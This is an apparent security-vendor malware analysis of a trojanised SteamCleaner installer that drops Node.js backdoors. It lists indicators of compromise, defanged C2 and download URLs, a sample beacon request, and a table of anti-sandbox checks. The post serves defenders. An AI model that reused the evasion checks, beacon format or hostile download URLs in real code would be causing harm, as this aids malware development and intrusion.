Distribution of Backdoor Malware with Legitimate Signature, Disguised as Steam Cleanup Tool
Multiple cases have been reported where malware disguised as the “SteamCleaner” tool for cleaning the popular game platform Steam client is being distributed. When a system is infected with this malware, a malicious Node.js script resides on the user’s PC and communicates with the C2 server periodically, allowing threat actors to execute commands.
SteamCleaner is an open-source tool that cleans up junk files in the Steam client. It has not been updated since September 2018.
Figure 1. SteamCleaner source code published on Github
The threat actor added malicious code to the original source code, built it, packed it with an InnoSetup installer, and distributed the file signed with a valid certificate. When this malware is executed, the code added by the threat actor is executed, and a malware that allows remote command execution is installed.
Figure 2. Malware signature and properties
AhnLab SEcurity intelligence Center (ASEC) has confirmed that this malware is being distributed by redirecting users from a website disguised as a page for downloading illegal software such as cracks and keygens to a GitHub repository where the malware is uploaded. The fact that this malware is being distributed more actively through multiple channels compared to the previously distributed malware suggests that the same malware is being distributed through various channels.
Figure 3. Example of a Proyware malware distribution page
Distribution URL
- hxxps://raw.githubusercontent[.]com/erindaude/3O/main/Setup.exe
In addition to the above URL, the threat actor has created multiple repositories in a specific GitHub account and uploaded multiple instances of the same type of malware, using them for distributing the malware.
The malware is downloaded with the file name ‘Setup.exe’ and when executed, it installs the malware in the C:\Program Files\SteamCleaner\ directory before executing it. The installed malware is a modified version of SteamCleaner. This file is not signed.
Figure 4. Malware installation path
Comparing the legitimate SteamCleaner executable with the modified version, it can be seen that the original code has been kept, and classes and methods have been added to perform malicious behaviors.
Figure 5. Structure of Proxyware (left) and normal file (right)
The added malware has multiple anti-sandbox functions. It uses techniques such as checking system information, port counts, WMI queries, files and paths, process modules, process, and Sleep operation. In a sandbox environment, the original program is executed without any malicious behaviors.
Figure 6. Screen after executing malware
| Check Target | Item |
| Module |
cmdvrt32.dll cmdvrt64.dll kernel32.dll:wine_get_unix_file_name() SbieDll.dll cuckoomon.dll SxIn.dll |
| File |
balloon.sys netkvm.sys vioinput viofs.sys vioser.sys VBoxMouse.sys VBoxGuest.sys VBoxSF.sys VBoxVideo.sys vmmouse.sys vboxogl.dll |
| WMI Query |
SELECT * FROM Win32_PortConnector Select * from Win32_ComputerSystem
|
| Path |
[Directory] C:\Program Files\VMware C:\Program Files\oracle\virtualbox guest additions [Named Pipe] \\.\pipe\cuckoo \\.\HGFS \\.\vmci \\.\VBoxMiniRdrDN \\.\VBoxGuest \\.\pipe\VBoxMiniRdDN \\.\VBoxTrayIPC \\.\pipe\VBoxTrayIPC |
| Process |
vboxservice VGAuthService vmusrvc qemu-ga |
Table 1. Summary of anti-sandbox techniques
Then, it decrypts and executes the PowerShell command that is stored encrypted inside the malware. This command installs Node.js on the system and downloads and installs two different malicious Node.js scripts from the two C2 servers. Afterward, it registers these scripts to the task scheduler. The registered tasks are automatically executed when the system boots up and every hour.
Both scripts are malware that can execute commands through C2. When connecting to the C2 to receive commands, the infected system’s information is sent. Threat actors can refer to this information for their future attacks. Upon connecting to the C2, the following JSON data structure is sent to the /d path, and the execution result is sent to the /e path. The only difference between the two is the User-Agent item in the header and the agent_version item in the data. The difference is summarized in the table below.
POST /d HTTP/1.1
host: aginscore.com
connection: keep-alive
Content-Type: application/json
accept: */*
accept-language: *
sec-fetch-mode: cors
user-agent: node
accept-encoding: br, gzip, deflate
content-length: 271
{
"os_type": "Windows_NT",
"os_name": "win32",
"os_release": "10.0.22631",
"os_version": "Windows 11 Pro",
"os_hostname": "DESKTOP-xxxxxxx", //PC 이름
"os_arch": "x64",
"machine_id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", //장치 GUID
"agent_version": "17.2.7",
"session_id": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" //랜덤 Hex
}
The first Node.js script can download a file from a specific URL and then execute commands such as CMD and PowerShell to run the downloaded file. The “agent_version” field in the table below is the JSON data sent to the C2, and it is presumed to be an identifier used to manage the version of the malware.
|
Installation Path |
C:\WCM\{UUID}\UUID | |
|
Task Scheduler Path |
Microsoft/Windows/WCM/WiFiSpeedScheduler | |
|
Download URL |
hxxps://rt-guard[.]com/updates/KB80164432 | |
|
Malware MD5 |
5ea776ca7dccac71138a6e92a4f5c934 (Downloader/JS.Proxyware.SC291258) |
|
|
C2 |
rt-guard[.]com 4tressx[.]com kuchiku[.]digital screenner[.]com |
|
|
Data to Send |
User-Agent | insomnia/2023.4.0. Windows |
| agent_version | 0.3.0 | |
Table 2. Summary of the malicious script (1)
The second Node.js script receives commands from the C2, executes them, and then sends the output back to the C2. The first script takes a URL as an argument and downloads the content from the URL, which is then executed using an external process such as CMD or PowerShell. The second script differs in that it receives commands and executes them using the exec function, which is a shell execution function within Node.js. Furthermore, a more advanced obfuscation technique has been applied, making analysis more difficult.
|
Installation Path |
C:\WindowsSetting\{UUID}\UUID | |
|
Task Scheduler Path |
Microsoft/Windows/Diagnosis/RecommendedDiagnosisScheduler | |
|
Download URL |
hxxps://uuu.rqfefxsa[.]xyz/cab.js | |
|
Malware MD5 |
804957e501ee0443632ea675353326d4 (Trojan/JS.Proxyware.SC295915) |
|
|
C2 |
aginscore[.]com | |
|
Transmitted Data |
User-Agent | node |
| agent_version | 17.2.7 | |
Table 3. Summary of Malicious Script Information (2)
At the time of analysis, both scripts only responded with empty commands from C2, so their final behaviors could not be confirmed. However, there is a record of similar malware in the past responding to commands to install Proxyware. Since the malware is capable of executing arbitrary commands, it is also possible for them to install other types of malware according to the threat actor’s intentions, so caution is advised.
For information on previously confirmed cases of Proxyware distribution, please refer to the ASEC blog.
- Proxyware Malware Being Distributed Through YouTube Video Download Site
- Proxyware Malware Being Distributed Through YouTube Video Downloading Site – 2
As seen above, there are continuously being distributed malware that are sophisticatedly disguised as legitimate programs or utilities to conceal their malicious behaviors, so extra caution is advised. In particular, files downloaded from untrusted websites or communities should not be executed, and the use of illegal programs such as cracks and keygens should be avoided. Such illegal files are often used as distribution channels for malware, which can lead to various damages such as information theft, remote control, and installation of additional malware.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
